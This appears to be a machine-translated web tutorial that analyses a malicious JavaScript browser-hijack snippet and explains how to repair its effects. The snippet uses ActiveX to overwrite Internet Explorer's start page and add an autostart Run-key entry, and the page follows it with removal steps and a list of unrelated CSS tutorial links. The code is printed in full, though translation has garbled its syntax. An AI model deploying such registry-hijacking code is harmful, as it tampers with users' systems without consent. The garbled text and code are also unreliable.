Anatomy of a malicious Web site code: IE pop-up pages
Related Tags:
Below we pass on the anatomy of this JavaScript programs that readers can understand their reasons, and mastery of repair methods. Site of rich should be used to attract visitors columns that users through malicious tampering with the registry to achieve the purpose of visit will not only anti-matter appropriately, is an immoral act.
following code only to study and research purposes.
<! - Begin set start page brought to u by JavaHouse.126.com-->
<SCRIPT Language=JavaScript>
Document.write ( "<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent> </ APPLET>");
Function f () (
Try
(
/ / ActiveX initialization process (for the user to modify the registry must be prepared by the procedure)
A1 = document.applets [0];
A1.setCLSID ( "(F935DC22-1CF0-11D0-ADB9-00C04FD58A0B)");
A1.createInstance ();
Shl = a1.GetObject ();
A1.setCLSID ( "(0D43FE01-F093-11CF-8940-00A0C9054228)");
A1.createInstance ();
FSO = a1.GetObject ();
A1.setCLSID ( "(F935DC26-1CF0-11D0-ADB9-00C04FD58A0B)");
A1.createInstance ();
Net = a1.GetObject ();
Try
(
If (document.cookie.indexOf ( "Chg") == -1)
/ / The following is the registry and modify users of the corresponding keys
(
Shl.RegWrite ( "HKCU \ \ Software \ \ Microsoft \ \ Internet Explorer \ \ Main \ \ Start Page," "http://JavaHouse.126.com/ ");// modify user InternetExplorer browser default home page
Shl.RegWrite ( "HKCU \ \ Software \ \ Microsoft \ \ Windows \ \ CurrentVersion \ \ Run \ \", "http://JavaHouse.126.com/ ");// default start page to establish procedures to ensure that users Every time your computer open the first page
Var expdate = new Date ((new Date ()). GetTime () (1));
Document.cookie = "Chg = general; expires =" expdate.toGMTString () "; path = /;"
)
)
Catch (e)
()
)
Catch (e)
()
)
Function init ()
(
SetTimeout ( "f ()", 1000); / / Implementation open pages within seconds after a test implementation of the work of amending the registry
)
Init ();</ SCRIPT>
<! - End set start page ->
First, we have to take a look at this code, the use of procedures:
Shl.RegWrite ( "HKCU \ \ Software \ \ Microsoft \ \ Internet Explorer \ \ Main \ \ Start Page," "http://JavaHouse.126.com/ ");// modify user's default browser InternetExplorer Home
is actually modify user registry
HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ main \ folder under the Start Page keys,
this value is stored inside the IE browser's default home page, if you want to come back, the code corresponding to the above:
Shl.RegWrite ( "HKCU \ \ Software \ \ Microsoft \ \ Internet Explorer \ \ Main \ \ Start Page," and "about: blank");
can be achieved to open IE is a blank page; Of course, you need not move the registry directly modify open Internet Options in the IE home page more comfortable.
another look at the procedures a most despicable code:
Shl.RegWrite ( "HKCU \ \ Software \ \ Microsoft \ \ Windows \ \ CurrentVersion \ \ Run \ \", "http://JavaHouse.126.com/ ");// default start page to establish procedures ensure that each time you start the computer users first open the pages
through the registry
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run
established under the Windows folder default commencement of the proceedings, when Windows starts, we will find that this page will open automatically, but in the "start" - "process" - "start" is not, which is why? Oh, have put the original Run the Below this folder. How to amend? Two ways, first, find the source, enter the registry, delete Run below the corresponding item will be the second in the "start" - "run" the type "msconfig" and the initiation of that site below the corresponding previous "√ "removed to restart the computer to do.
avoid such malicious modify the registry from happening again, you can attribute IE's security settings cut off ActiveX, of course, the Web browser in the future may result in the course of normal use ActiveX some sites inaccessible. Another way is open for Windows98 C: \ WINDOWS \ JAVA \ Packages \ CVLV1NBB.ZIP, ActiveXComponent.class deleted; for WindowsMe Open the C: \ WINDOWS \ JAVA \ Packages \ 5NZVFPF1.ZIP to delete ActiveXComponent.class . Rest assured that the deletion of the normal component will not affect your web browser.
talk about the final use of such code in the Home The purpose of the web site, such as in your computer directly to the web I think that is mainly directed against and green broadband Internet users so that as long as you do not modify the registry cut it off, you IE Home of each access to the system will automatically be changed into that site; for each dial-up Internet users have access to the system could not find an open page, it is all right, at least you do not change the registry directly modify IE can be avoided after Home Properties that site was again amended (the premise that the site is no longer Jin), but after each boot pop-up pages are also really is disgusting.
above code applicable to Windows9x/Me, InternetExplorer5.X browser, said the IE6.0 invalid (because it did not ActiveXComponent.class this component), but the author has not tested.
- HTML and CSS pages prepared by the beautiful formal code
- CSS code abbreviation skills
- Clever css debug code
- Optimizing your CSS code
- CSS code attributes Encyclopaedia (HTML)
- CSS code structure of: the div and span!
- Common CSS code
- CSS simple picture-Daolian code
- Css code explain
- CSS style definition of the rolling code
- CSS code abbreviation skills zz
- Some commonly used CSS code
- CSS control ul code base
- CSS code-switching function tab
- How to Optimize your CSS code?
- Css common code
- Summary: A CSS code reference map
- Js code and code folding effect css
- The magic code - CSS filter trip
- CSS code-writing techniques commonly used
Flash MX 2004 ActionScript by Guide (6)
1.4.4 code-writing now entering the most trouble steps - code-writing, we will be exposed to a lot of new things. 1, a text file data loading in the beginning, we have established a text file, named it "subtrahend.txt" there. Fla the directory paper, a document that c...
Javascript broadcast the music random code
The following code will be placed with <head> </ head> can be between. <SCRIPT Language="JavaScript"> <! -- Var sound1 = "midi/1.mid" Var sound2 = "midi/2.mid" Var sound3 ...
Why not on Google, I found the website?
Regular users: I submitted to the Google Web site has an on, but that is not my page, this is how the case? In fact, Google included in the website is still quite tolerant, sometimes in the new website on Google not, it does not mean not been included, but you had too impatient.&...
Web code to use the TAB key into the Enter key
<! DOCTYPE HTML PUBLIC "- / / W3C / / DTD HTML 4.0 Transitional / / EN"> <HTML> <HEAD> <TITLE> New Document </ TITLE> <META NAME="Generator" CONTENT="EditPlus"> <META NAME="A...
Rational use HTML tags to CSS layout
High CSS layout has been gradually pandemic, in the face of the so-called DIV + CSS layout of the name more worried about people not to let DIV become a substitute for the Table, multi-nested DIV will seriously affect the code can be read, apply HTML provide us with the label it. &nbs...